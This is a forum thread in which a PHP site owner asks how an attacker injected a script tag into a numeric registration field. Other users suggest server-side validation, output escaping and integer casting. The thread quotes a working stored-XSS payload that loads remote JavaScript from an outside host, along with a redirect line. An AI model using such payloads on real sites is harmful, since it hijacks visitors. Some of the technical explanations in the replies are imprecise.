Hi, My site is coded in PHP On my website to register you need a friendid. The friendid can only be numeric and we have put a check to it... I don't know how this same person is able to enter <script src=http://usuc.us/j.php>jonny</script> in that numeric area where there is only 6 characters allowed. Now once he enters, that profile is displayed on the website and as soon as somone opens my website, it redirects to his website. I have deleted the record for now...but he will come back again and do the same thing. WHen i test the whole page, it works fine and no body can enter script tag...then how is he able to do that..??? Please help
Firstly, is your check client side or server side? If it's getting in to the database, it sounds like it's client side. Is the length limit controlled by JavaScript? If the check is client side, I'd say the user has disabled JavaScript. If the length is checked by JavaScript, well, same thing. If not, remember that just because you send a page to the user and that page has a length limit in it, doesn't mean that that user is going to be limited to it... there's a number of different ways it could be done (save / edit / load page locally, use a browser that ignores length limits etc.).
Hi, My check is both client side and server side. But why is my application regarding this <script src=http://usuc.us/j.php>jonny</script> as a script to redirect.. For e.g. i am putting this here <script src=http://usuc.us/j.php>jonny</script> And when you open this forum page, we are not getting redirected.....but why is when you paste this code in any public area of my website, it works and the site get redirected... how to make my code just take this as text
Because this site parses the information and shows it as it was typed, not as usable HTML if that makes sense. If you select the text here and view the source of that selection, you will see that the < sign is represented in HTML as <. Essentially, the code parses any HTML and converts it to display as opposed to getting parsed. Sorry... I know that's not a great explanation so I'm hoping you understand the 'underlying concepts' of HTML.
htmlentities() htmlspecialchars() Also if the limit is 6 characters and you enforce is server side it _would not_ be possible to do that.. so I'm not sure you are checking it server side.
The reason it redirects is because the page is already being executed by php, and so it's searching for embedded code, ( which is all that php is ), the user has entered a js rediect function window.location="http://www.usuc.us/enter/goto.php"; To solve this particular problem, make sure you use strip_tags() however, I'd recommend doing a more thorough job of coding the forms in the first place.
How about using $the_friend_id = (int) $_REQUEST['friendid']; PHP: Or what not? Type casting the variable as an integer should prevent it from being text, to my knowledge.
I prefer spending a little more time to develop code which does not rely on type, but rather enforces very strict content rules. I prefer to reduce all user input to that which is allowed and when something is not allowed, I make it safe if it is to be redisplaying to the user. In your case, I would also make sure database content is neutered. I would listen to krakjoe on this issue and take the time to clean up your forms so that this problem does not reoccur.
Thanks a lot guys...I took your advice and cleaned up the code.....That's the best way to protect all this to make strict server side validation and using strip tags kind of functions
If there is any options to enable HTML in your site/code, /forum or whatever then disable it. I hope it works.
Alot of research needs to be done in that area, tom007, to learn how to cover all of the different evil possibilities! If you use a MySQL database, you may need to look up the mysql escape string function, too.